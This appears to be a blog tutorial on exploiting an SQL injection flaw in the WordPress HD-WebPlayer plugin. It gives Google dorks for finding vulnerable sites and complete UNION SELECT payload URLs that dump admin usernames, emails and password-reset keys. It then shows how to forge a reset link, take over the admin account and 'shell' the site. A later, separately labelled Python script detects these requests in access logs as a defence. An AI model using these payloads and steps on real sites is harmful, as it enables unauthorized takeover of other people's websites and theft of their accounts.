Hello. After writing Top 3 Premium Blogger Templates For Free, I was searching for some WordPress exploits, and I found this SQL injection vulnerability in a plugin named HD-WebPlayer. So what is the loophole?
Let's begin. Your first step is, as always, to find a vulnerable site using Google dorks.

For this exploit there are 3 special dorks:

Dork #1 (config.php):
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

Dork #2 (playlist.php):
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

Dork #3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"

Use a Google dork to find a vulnerable site, like this:

Now you have found the site, so let's try to inject it.
For example:
http://Site.com/wp-content/plugins/hd-webplayer/config.php?id=2
So replace it with:

http://Site.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--

You have to add the URL below after Site.com:
wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Now, when you replace that URL, the website must show this.

Check what I have replaced: I commanded the database to fetch user_login and user_email from the users table. I am not explaining SQLi here. I will make a tutorial, so wait for my tutorial or Google about it.

Now go to the admin panel login page by typing http://Site.com/wp-login.php or
http://Site.com/wp-admin
and click on "Lost your password?"
After that, write either the username or the email which you got in the previous step and press Enter. Now you have to get the authorization code which has been sent to the admin's email, so you have to inject again. Add the code below after the site URL, like http://Site.Com/

http://www.Site.Com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
It will show the authorization code. Now you have to make a custom URL for resetting the password. For resetting, add this URL after http://Site.com/

wp-login.php?action=rp&key=YOUR_RESET_KEY&login=USERNAME
Now replace YOUR_RESET_KEY with the authorization key and USERNAME with the username (I selected admin). It will now ask you to change the password :) Log in to the dashboard and shell that site.
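
Seen from the defending side, the requests in this walkthrough leave a recognizable trail in the web server's access log: a non-numeric id or videoid sent to the plugin, followed by a wp-login.php?action=rp request from the same client. The script below is an added example, not part of the original post; it assumes Combined Log Format, and the log lines, IP addresses and reset key in it are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Plugin endpoints and the parameter each one reads, as named in the post.
WATCHED = {"config.php": "id", "playlist.php": "videoid"}
PLUGIN_DIR = "/wp-content/plugins/hd-webplayer/"
# Assumed log layout: Combined Log Format (client IP first, quoted request line).
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

def classify(line):
    """Return (ip, tag); tag is 'sqli', 'reset' or None."""
    m = LINE_RE.match(line)
    if not m:
        return None, None
    ip, target = m.groups()
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)  # URL-decodes values
    path = parts.path.lower()
    if PLUGIN_DIR in path:
        param = WATCHED.get(path.rsplit("/", 1)[-1])
        values = query.get(param, []) if param else []
        # Both parameters are numeric ids, so any other value is suspect.
        if any(not re.fullmatch(r"[0-9]+", v) for v in values):
            return ip, "sqli"
    elif path.endswith("/wp-login.php") and "rp" in query.get("action", []):
        return ip, "reset"
    return ip, None

def find_takeover_attempts(lines):
    """Clients that sent a non-numeric id to the plugin, then opened a reset link."""
    injected, flagged = set(), []
    for line in lines:
        ip, tag = classify(line)
        if tag == "sqli":
            injected.add(ip)
        elif tag == "reset" and ip in injected and ip not in flagged:
            flagged.append(ip)
    return flagged

# Constructed sample lines (documentation IP ranges, placeholder reset key).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=3 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:02:10 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=-3%20UNION%20SELECT%201,2,3%20FROM%20wp_users-- HTTP/1.1" 200 900',
    '203.0.113.9 - - [01/Jan/2024:10:05:42 +0000] "GET /wp-login.php?action=rp&key=PLACEHOLDER&login=admin HTTP/1.1" 200 2100',
    '198.51.100.7 - - [01/Jan/2024:10:06:00 +0000] "GET /wp-login.php?action=rp&key=PLACEHOLDER&login=editor HTTP/1.1" 200 2100',
]

if __name__ == "__main__":
    print(find_takeover_attempts(SAMPLE_LOG))
```

A flagged address is a lead for review: the sqli tag on its own already marks a request worth investigating, and the later reset request shows the same client moved on to the login page.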

Any problem? Comment below or email us at Contact@eHowTutorials.net
